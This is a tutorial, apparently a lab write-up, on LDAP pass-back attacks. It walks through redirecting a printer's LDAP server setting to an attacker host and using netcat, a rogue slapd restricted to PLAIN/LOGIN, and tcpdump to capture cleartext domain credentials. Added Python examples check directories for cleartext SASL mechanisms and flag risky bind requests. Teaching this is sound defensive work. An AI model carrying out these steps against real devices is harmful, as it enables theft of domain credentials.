An LDAP pass-back attack becomes possible when a device that authenticates against an LDAP server can be reconfigured to delegate that authentication to a different LDAP server under the attacker's control.
LDAP pass-back attacks occur when a person gains access to the configuration settings of a device where the LDAP (Lightweight Directory Access Protocol) server details are stored. A typical example is a network printer with a web interface. The login credentials for these device interfaces are often left at their default values, such as “admin:admin” or “admin:password”. Even with access to the interface, the stored LDAP credentials cannot be read directly, because the password field is masked.
In an LDAP pass-back attack, the attacker changes the IP address or hostname of the LDAP server in the device’s configuration to an address they control and then triggers the configuration test. The device responds by attempting to authenticate over LDAP to the attacker’s fake server, which receives the bind request and with it the LDAP credentials.
Attack scenario
Let’s consider a scenario where a network printer exposes a configuration web page that requires no administrative login. On this page the username and password fields are already preset: the username is visible, the password is masked, and a server option holds a default IP address.
The user can change the server information and apply it by pressing an update button. Once the update button is pressed, “an authentication request is sent to the domain controller to validate the preset LDAP credentials”.
Let’s exploit this:
Change the server IP address to your own IP, start a netcat listener on port 389 (the LDAP port), and then click the update button.
When the connection comes back, it looks like this:
┌──(arun㉿kali)-[~/AD/AD-THM-Rooms/breachingad]
└─$ nc -lvp 389
listening on [any] 389 ...
10.200.25.201: inverse host lookup failed: Unknown host
connect to [10.50.23.54] from (UNKNOWN) [10.200.25.201] 62165
0�Dc�;
x�
objectclass0�supportedCapabilities
Set up Rogue LDAP Server
Now, we need to set up a rogue LDAP server to capture the credentials.
Install slapd and ldap-utils:
sudo apt-get update && sudo apt-get -y install slapd ldap-utils
Set an administrator password when prompted.
Next, configure the domain:
sudo dpkg-reconfigure -p low slapd
1. Omit OpenLDAP server configuration? No
2. DNS domain name: the AD domain name, e.g. testdomain.com
3. Organization name: the AD domain name, e.g. testdomain.com
4. Confirm the administrator password you set during the initial configuration.
5. Do you want the database to be removed when slapd is purged? No
6. Move old database files before creating a new database? Yes
sudo systemctl enable slapd
sudo systemctl start slapd
In order to obtain the clear-text credentials, we must reconfigure our LDAP server to only support the PLAIN and LOGIN authentication methods. To do this, we need to create a new LDIF file with the following information:
#olcSaslSecProps.ldif
dn: cn=config
changetype: modify
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
olcSaslSecProps specifies the SASL security properties. The noanonymous flag disables mechanisms that support anonymous login; minssf is the minimum acceptable security strength factor, where 0 means no protection is required; passcred allows mechanisms that pass the client credentials through.
Apply the new changes using the ldapmodify command and restart the LDAP server.
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart
To verify the modification:
ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms
dn:
supportedSASLMechanisms: PLAIN
supportedSASLMechanisms: LOGIN
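The ldapsearch output above is also what a defender should run against their own directory: a server that advertises PLAIN or LOGIN and requires no security strength factor will accept exactly the cleartext binds a pass-back relies on. The following is an added example, not code from the original post or from OpenLDAP, that parses that root DSE output (including folded and base64 `::` values) and an olcSaslSecProps value, and reports whether credentials can be sent in the clear. The samples WEAK_ROOTDSE and HARDENED_ROOTDSE are constructed here, and the function names are this example's own.

```python
import base64
from typing import Dict, List, Optional

# Constructed sample: the root DSE output shown on this page for the rogue
# server after it was restricted to PLAIN and LOGIN.
WEAK_ROOTDSE = """dn:
supportedSASLMechanisms: PLAIN
supportedSASLMechanisms: LOGIN
"""

# Constructed sample for comparison: a directory that only advertises
# mechanisms which never carry the password itself. One value is base64
# encoded ("SCRAM-SHA-256") to exercise the `::` LDIF syntax.
HARDENED_ROOTDSE = """dn:
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: DIGEST-MD5
supportedSASLMechanisms:: U0NSQU0tU0hBLTI1Ng==
"""

# SASL mechanisms that transmit the password (or a trivially reversible
# encoding of it) unless the transport itself is encrypted.
CLEARTEXT_MECHS = {"PLAIN", "LOGIN"}


def parse_ldif_entry(text: str) -> Dict[str, List[str]]:
    """Parse one entry of `ldapsearch -LLL` output into attribute -> values.

    Handles folded continuation lines (leading space) and base64 values (`::`).
    """
    lines: List[str] = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]  # unfold a wrapped value
        elif raw.strip():
            lines.append(raw)
    attrs: Dict[str, List[str]] = {}
    for line in lines:
        name, _, rest = line.partition(":")
        if rest.startswith(":"):
            value = base64.b64decode(rest[1:].strip()).decode("utf-8")
        else:
            value = rest.strip()
        attrs.setdefault(name.strip(), []).append(value)
    return attrs


def parse_sasl_secprops(props: str) -> Dict[str, str]:
    """Parse an olcSaslSecProps value such as "noanonymous,minssf=0,passcred".

    Bare flags map to "true"; key=value items keep their value.
    """
    parsed: Dict[str, str] = {}
    for item in props.split(","):
        item = item.strip()
        if item:
            key, _, value = item.partition("=")
            parsed[key] = value or "true"
    return parsed


def assess_ldap_server(rootdse_ldif: str, sasl_secprops: Optional[str] = None) -> Dict[str, object]:
    """Report whether a server will accept credentials it can read in the clear.

    rootdse_ldif: the ldapsearch output for supportedSASLMechanisms.
    sasl_secprops: the server's olcSaslSecProps value, if known (it is only
    readable by the directory administrator, not from the network).
    """
    attrs = parse_ldif_entry(rootdse_ldif)
    mechanisms = sorted(set(attrs.get("supportedSASLMechanisms", [])))
    cleartext = sorted(set(mechanisms) & CLEARTEXT_MECHS)
    findings: List[str] = []
    if cleartext:
        findings.append("advertises password-carrying SASL mechanisms: " + ", ".join(cleartext))
    min_ssf: Optional[int] = None
    if sasl_secprops is not None:
        props = parse_sasl_secprops(sasl_secprops)
        min_ssf = int(props.get("minssf", "0"))
        if min_ssf == 0:
            findings.append("minssf=0: no encryption or integrity protection is required for SASL binds")
        if "noplain" not in props:
            findings.append("noplain not set: plaintext password mechanisms are permitted")
    return {
        "mechanisms": mechanisms,
        "cleartext_mechanisms": cleartext,
        "min_ssf": min_ssf,
        "accepts_cleartext_credentials": bool(cleartext),
        "findings": findings,
    }


if __name__ == "__main__":
    for label, ldif, props in (
        ("rogue/weak", WEAK_ROOTDSE, "noanonymous,minssf=0,passcred"),
        ("hardened", HARDENED_ROOTDSE, "noanonymous,noplain,minssf=128"),
    ):
        report = assess_ldap_server(ldif, props)
        print(label, report["mechanisms"], report["findings"])
```

Feed the function the output of the same ldapsearch command run against a production directory; an empty findings list means the server at least does not offer to take the password in the clear, which removes the condition the rogue server on this page is deliberately configured to create.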
Change the server IP on the printer web page to the rogue server and trigger the update. Check for the following error: “This distinguished name contains invalid syntax”. If you receive this error, use tcpdump to capture the credentials.
sudo tcpdump -SX -i breachad tcp port 389
Examine the tcpdump output carefully and search for the password, which should appear in plaintext.
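What tcpdump shows in plaintext is the LDAP BindRequest: a BER-encoded message whose “simple” authentication choice is the password as an OCTET STRING. The following is an added example, not code from the original post, that decodes such a message and reports whether it is a simple bind sent without TLS and whether it went to an approved LDAP server, without ever returning the password. It assumes the raw TCP payload has already been extracted from the capture; the two bind messages and the 192.0.2.x addresses are constructed for this example, and the function names are this example's own.

```python
from typing import Dict, List, Set, Tuple


def _hex(s: str) -> str:
    return s.encode("utf-8").hex()


# Constructed sample: the BindRequest a device emits when it tests its LDAP
# settings with a simple bind on port 389. Hand-assembled BER (messageID 1,
# LDAP v3, name "svcprinter", simple password "Passw0rd!"). Not a real credential.
SAMPLE_SIMPLE_BIND = bytes.fromhex(
    "301f"                         # LDAPMessage SEQUENCE, 31 bytes follow
    "020101"                       # messageID INTEGER 1
    "601a"                         # BindRequest [APPLICATION 0], 26 bytes follow
    "020103"                       # version INTEGER 3
    "040a" + _hex("svcprinter")    # name OCTET STRING
    + "8009" + _hex("Passw0rd!")   # authentication [0] simple: the password itself
)

# Constructed sample: the same bind using SASL/GSSAPI, where no password travels.
SAMPLE_SASL_BIND = bytes.fromhex(
    "301e" "020101" "6019" "020103"
    "040a" + _hex("svcprinter")
    + "a308"                       # authentication [3] SaslCredentials, 8 bytes follow
    + "0406" + _hex("GSSAPI")      # mechanism OCTET STRING, no initial credentials
)


def read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Read one BER element at pos; return (tag, contents, position after it).

    Supports short and long definite-length forms, which is all LDAP uses.
    """
    if pos + 2 > len(buf):
        raise ValueError("truncated BER header")
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    contents = buf[pos:pos + length]
    if len(contents) != length:
        raise ValueError("truncated BER contents")
    return tag, contents, pos + length


def parse_bind_request(msg: bytes) -> Dict[str, object]:
    """Decode an LDAPMessage and, for a BindRequest, report how it authenticates.

    The password is never returned, only whether one was sent in the clear.
    """
    tag, body, _ = read_tlv(msg, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    tag, mid, pos = read_tlv(body, 0)
    if tag != 0x02:
        raise ValueError("missing messageID")
    info: Dict[str, object] = {"message_id": int.from_bytes(mid, "big"), "bind": False}
    tag, op, _ = read_tlv(body, pos)
    if tag != 0x60:                      # [APPLICATION 0] = BindRequest
        info["op_tag"] = tag
        return info
    _, ver, pos = read_tlv(op, 0)
    _, name, pos = read_tlv(op, pos)
    auth_tag, auth, _ = read_tlv(op, pos)
    info.update(bind=True, version=int.from_bytes(ver, "big"), name=name.decode("utf-8", "replace"))
    if auth_tag == 0x80:                 # [0] simple: password as an OCTET STRING
        info.update(auth="simple", password_length=len(auth), cleartext_password=len(auth) > 0)
    elif auth_tag == 0xA3:               # [3] SaslCredentials SEQUENCE { mechanism, credentials? }
        _, mech, _ = read_tlv(auth, 0)
        mechanism = mech.decode("utf-8", "replace")
        info.update(auth="sasl", mechanism=mechanism,
                    cleartext_password=mechanism.upper() in {"PLAIN", "LOGIN"})
    else:
        info.update(auth="unknown", cleartext_password=None)
    return info


def assess_bind_capture(msg: bytes, dst_host: str, approved_ldap_hosts: Set[str], tls: bool) -> List[str]:
    """Findings for one captured LDAP message sent to dst_host.

    tls: whether the connection was LDAPS or had completed StartTLS, as seen in the capture.
    """
    info = parse_bind_request(msg)
    findings: List[str] = []
    if not info["bind"]:
        return findings
    if dst_host not in approved_ldap_hosts:
        findings.append(f"bind as '{info['name']}' sent to unapproved LDAP server {dst_host}: possible pass-back")
    if info.get("cleartext_password") and not tls:
        findings.append(f"{info['auth']} bind as '{info['name']}' sends the password unencrypted to {dst_host}")
    return findings


if __name__ == "__main__":
    print(parse_bind_request(SAMPLE_SIMPLE_BIND))
    print(assess_bind_capture(SAMPLE_SIMPLE_BIND, "192.0.2.50", {"192.0.2.10"}, tls=False))
```

Two findings on the simple bind, an unapproved destination and an unencrypted password, are the two conditions a pass-back needs; a device that only binds with GSSAPI or over TLS to its configured domain controller produces neither, which is the state to verify after changing a printer's LDAP settings.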
Thank you! keep learning 😉